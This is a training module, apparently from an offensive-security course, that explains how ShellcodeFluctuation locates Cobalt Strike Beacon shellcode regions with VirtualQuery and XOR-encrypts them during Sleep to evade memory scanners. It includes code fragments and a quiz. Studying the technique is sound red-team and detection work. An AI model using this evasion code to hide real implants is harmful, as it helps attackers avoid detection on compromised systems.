Difficulty: Intermediate

Module 6: Shellcode Region Tracking

Identifying shellcode allocation boundaries, using VirtualQuery for page-aligned operations, and supporting complex memory layouts.

Module Objective

Learn how ShellcodeFluctuation identifies the shellcode memory region boundaries when the MySleep hook fires, how VirtualQuery provides page-aligned region information, how to handle shellcode that spans multiple memory regions, and the challenges of tracking dynamically allocated sub-regions.

1. The Region Discovery Problem

When the Beacon shellcode calls Sleep and control transfers to MySleep, the hook handler needs to know exactly which memory region to encrypt. This is not always straightforward because:

Region Discovery Challenges

2. VirtualQuery: The Region Inspector

VirtualQuery is the primary API for discovering memory region properties. Given any address within a region, it returns the region's base address, size, protection, and type:

// VirtualQuery signature
SIZE_T VirtualQuery(
    LPCVOID                   lpAddress,  // Any address in the region
    PMEMORY_BASIC_INFORMATION lpBuffer,   // Output structure
    SIZE_T                    dwLength    // Size of output structure
);

// The MEMORY_BASIC_INFORMATION structure
typedef struct _MEMORY_BASIC_INFORMATION {
    PVOID  BaseAddress;       // Base of the page containing lpAddress
    PVOID  AllocationBase;    // Base of the entire allocation
    DWORD  AllocationProtect; // Initial protection at VirtualAlloc time
    SIZE_T RegionSize;        // Size of contiguous pages with same attributes
    DWORD  State;             // MEM_COMMIT, MEM_RESERVE, MEM_FREE
    DWORD  Protect;           // Current protection
    DWORD  Type;              // MEM_PRIVATE, MEM_MAPPED, MEM_IMAGE
} MEMORY_BASIC_INFORMATION;

Two fields are especially important for shellcode tracking:

FieldMeaningUse in Fluctuation
AllocationBaseThe base address returned by the original VirtualAlloc callIdentifies the start of the entire shellcode allocation
RegionSizeSize of contiguous pages with identical protection/state/typeDefines how much memory to encrypt (may be less than total allocation if protection varies)

3. Discovering Shellcode Boundaries at Hook Time

ShellcodeFluctuation can discover the shellcode region boundaries dynamically when the hook fires, using the return address on the stack:

// Dynamic region discovery using _ReturnAddress()
void WINAPI MySleep(DWORD dwMilliseconds) {
    // The return address points into the shellcode that called Sleep
    PVOID callerAddr = _ReturnAddress();

    // Query the memory region containing the caller
    MEMORY_BASIC_INFORMATION mbi;
    VirtualQuery(callerAddr, &mbi, sizeof(mbi));

    // mbi.AllocationBase = start of the shellcode allocation
    // Now walk all committed regions in this allocation
    LPVOID regionBase = mbi.AllocationBase;
    SIZE_T totalSize = 0;

    MEMORY_BASIC_INFORMATION walkMbi;
    LPVOID walkAddr = regionBase;

    while (VirtualQuery(walkAddr, &walkMbi, sizeof(walkMbi))) {
        // Stop if we've left the allocation
        if (walkMbi.AllocationBase != regionBase)
            break;

        // Only count committed regions
        if (walkMbi.State == MEM_COMMIT) {
            totalSize = (SIZE_T)((BYTE*)walkMbi.BaseAddress +
                        walkMbi.RegionSize - (BYTE*)regionBase);
        }

        walkAddr = (BYTE*)walkMbi.BaseAddress + walkMbi.RegionSize;
    }

    // Now we know: regionBase and totalSize
    // Proceed with fluctuation...
}

Why Use _ReturnAddress()?

_ReturnAddress() is an MSVC compiler intrinsic that returns the address of the instruction that will execute after the current function returns. When MySleep is called (via the hooked Sleep), the return address points into the Beacon shellcode. This gives us an address inside the shellcode allocation without needing to track it globally from the loader.

4. Page Alignment and VirtualProtect

VirtualProtect operates on page boundaries. Understanding page alignment is critical for correct fluctuation:

// x86-64 page size
#define PAGE_SIZE 0x1000  // 4096 bytes

// VirtualProtect rounds addresses DOWN to page boundary
// and sizes UP to include all affected pages.

// Example:
// shellcodeBase = 0x1A0000 (page-aligned, from VirtualAlloc)
// shellcodeSize = 0x4C800 (not page-aligned)

// VirtualProtect(0x1A0000, 0x4C800, PAGE_READWRITE, &old)
// Actually affects pages: 0x1A0000 through 0x1EC000
// That's ceil(0x4C800 / 0x1000) = 77 pages

// VirtualAlloc always returns page-aligned addresses:
LPVOID base = VirtualAlloc(NULL, size, MEM_COMMIT | MEM_RESERVE,
                           PAGE_READWRITE);
// base is guaranteed to be 0x????0000 (64K aligned on Windows)

Page Alignment Guarantees

APIBase Address AlignmentSize Alignment
VirtualAlloc64 KB (allocation granularity)Rounded up to page size (4 KB)
VirtualProtectRounds down to page boundaryRounds up to include full pages
VirtualQueryReports page-aligned regionsReports page-aligned sizes

Since VirtualAlloc returns 64K-aligned addresses and VirtualProtect rounds to page boundaries, the fluctuation operates cleanly on aligned memory regions. There is no risk of accidentally affecting memory outside the shellcode allocation.

5. Multi-Region Shellcode

Complex implants may not have a single contiguous memory region. A reflective DLL loader, for example, maps different PE sections with different protections:

// Reflective DLL memory layout example:
// AllocationBase = 0x1A0000
//
// Region 1: 0x1A0000 - 0x1A0FFF  PE headers  (PAGE_READONLY)
// Region 2: 0x1A1000 - 0x1A5FFF  .text       (PAGE_EXECUTE_READ)
// Region 3: 0x1A6000 - 0x1A7FFF  .rdata      (PAGE_READONLY)
// Region 4: 0x1A8000 - 0x1A9FFF  .data       (PAGE_READWRITE)
// Region 5: 0x1AA000 - 0x1AAFFF  .reloc      (PAGE_READONLY)

// Each region has different protection. We need to:
// 1. Save each region's current protection
// 2. Flip ALL to RW
// 3. Encrypt ALL
// 4. After sleep: Decrypt ALL
// 5. Restore EACH region's original protection

To handle this, the fluctuation code must walk the entire allocation and process each region individually:

struct RegionInfo {
    LPVOID  base;
    SIZE_T  size;
    DWORD   originalProtect;
};

// Walk the allocation and collect all committed regions
std::vector<RegionInfo> CollectRegions(LPVOID allocationBase) {
    std::vector<RegionInfo> regions;
    MEMORY_BASIC_INFORMATION mbi;
    LPVOID addr = allocationBase;

    while (VirtualQuery(addr, &mbi, sizeof(mbi))) {
        if (mbi.AllocationBase != allocationBase)
            break;

        if (mbi.State == MEM_COMMIT) {
            regions.push_back({
                mbi.BaseAddress,
                mbi.RegionSize,
                mbi.Protect
            });
        }

        addr = (BYTE*)mbi.BaseAddress + mbi.RegionSize;
    }

    return regions;
}

// Encrypt all regions
void EncryptAllRegions(std::vector<RegionInfo>& regions, DWORD key) {
    for (auto& r : regions) {
        DWORD oldProt;
        VirtualProtect(r.base, r.size, PAGE_READWRITE, &oldProt);
        r.originalProtect = oldProt;  // Save actual protection
        xor32((BYTE*)r.base, r.size, key);
    }
}

// Decrypt and restore all regions
void DecryptAllRegions(std::vector<RegionInfo>& regions, DWORD key) {
    for (auto& r : regions) {
        xor32((BYTE*)r.base, r.size, key);
        DWORD dummy;
        VirtualProtect(r.base, r.size, r.originalProtect, &dummy);
    }
}

6. Handling the Beacon Heap

Cobalt Strike Beacon allocates heap memory for its configuration, task buffers, and downloaded data. This heap data can contain IOCs (C2 URLs, decrypted task output, etc.) that scanners can find. ShellcodeFluctuation's approach to the heap varies:

ApproachWhat Gets EncryptedHeap CoverageComplexity
Single allocation onlyThe original VirtualAlloc region containing the shellcodeNone — heap is unprotectedSimple
All private executableAll MEM_PRIVATE regions with execute permissionsPartial — misses RW heap dataModerate
Full allocation walkAll committed regions under the same AllocationBaseGood — covers co-allocated regionsModerate
Heap trackingHook HeapAlloc/VirtualAlloc to track all implant allocationsFull — covers all implant memoryHigh

Practical Limitation

ShellcodeFluctuation's primary focus is the shellcode execution region (the code itself). Beacon's heap allocations for configuration and data buffers are separate and may not be covered by the basic fluctuation mechanism. More advanced solutions like Cobalt Strike's built-in Sleep Mask Kit provide broader coverage of Beacon-owned memory.

7. Thread Safety Considerations

If the implant uses multiple threads, the fluctuation mechanism must handle concurrency:

// Potential race condition:
//
// Thread 1 (Beacon): Calls Sleep -> MySleep encrypts shellcode
// Thread 2 (Worker): Still executing shellcode code
//
// If Thread 2 is running when Thread 1 encrypts, Thread 2
// will execute encrypted garbage and crash!

// ShellcodeFluctuation assumes single-threaded shellcode:
// Cobalt Strike Beacon calls Sleep from its main loop,
// and worker tasks complete before the sleep cycle.

// For multi-threaded implants, a more robust approach:
CRITICAL_SECTION g_fluctLock;
volatile LONG    g_activeThreads = 0;

void WINAPI MySleep_ThreadSafe(DWORD dwMilliseconds) {
    EnterCriticalSection(&g_fluctLock);

    // Wait for all other threads to reach a safe point
    while (InterlockedCompareExchange(&g_activeThreads, 0, 0) > 1) {
        LeaveCriticalSection(&g_fluctLock);
        SwitchToThread();
        EnterCriticalSection(&g_fluctLock);
    }

    // Safe to encrypt - only this thread is active in shellcode
    // ... perform fluctuation cycle ...

    LeaveCriticalSection(&g_fluctLock);
}

Single-Thread Assumption

In practice, ShellcodeFluctuation operates under the assumption that the Beacon is single-threaded at the point it calls Sleep. Cobalt Strike Beacon dispatches jobs synchronously in its main loop and only calls Sleep when all pending tasks are complete. This makes the single-thread assumption safe for the primary use case.

8. Region Tracking Summary

The complete region tracking approach used by ShellcodeFluctuation combines static initialization with dynamic verification:

// Complete region tracking flow in MySleep:
void WINAPI MySleep(DWORD dwMilliseconds) {
    // Option A: Use pre-configured global state
    // (Set during initialization by the loader)
    LPVOID base = g_state.shellcodeBase;
    SIZE_T size = g_state.shellcodeSize;

    // Option B: Dynamic discovery (more robust)
    // Uses _ReturnAddress() to find caller's allocation
    MEMORY_BASIC_INFORMATION mbi;
    VirtualQuery(_ReturnAddress(), &mbi, sizeof(mbi));
    base = mbi.AllocationBase;
    // Walk to find total committed size...

    // Validate: is this the expected region?
    if (base != g_state.shellcodeBase) {
        // Unexpected caller - could be a different thread
        // or the shellcode relocated. Use global state as fallback.
        base = g_state.shellcodeBase;
        size = g_state.shellcodeSize;
    }

    // Proceed with fluctuation using (base, size)
    FluctuateCycle(base, size, dwMilliseconds);
}

Key Takeaways

Knowledge Check

Q1: What does VirtualQuery's AllocationBase field represent?

A) The page-aligned base of the queried address
B) The base address of the process heap
C) The base address returned by the original VirtualAlloc call that created the allocation
D) The lowest address in the process address space

Q2: Why might a reflective DLL's memory layout require per-region protection tracking?

A) Reflective DLLs use PAGE_GUARD on all pages
B) Different PE sections (.text, .rdata, .data) have different original protections that must be individually restored
C) Reflective DLLs cannot be encrypted with XOR
D) Each section uses a different XOR key

Q3: How does ShellcodeFluctuation identify the shellcode region when the Sleep hook fires?

A) Uses pre-configured global state (base + size) set during initialization, optionally verified with _ReturnAddress() and VirtualQuery
B) Scans all process memory for executable private regions
C) Reads the shellcode path from a configuration file
D) Uses a hardware breakpoint to detect the shellcode region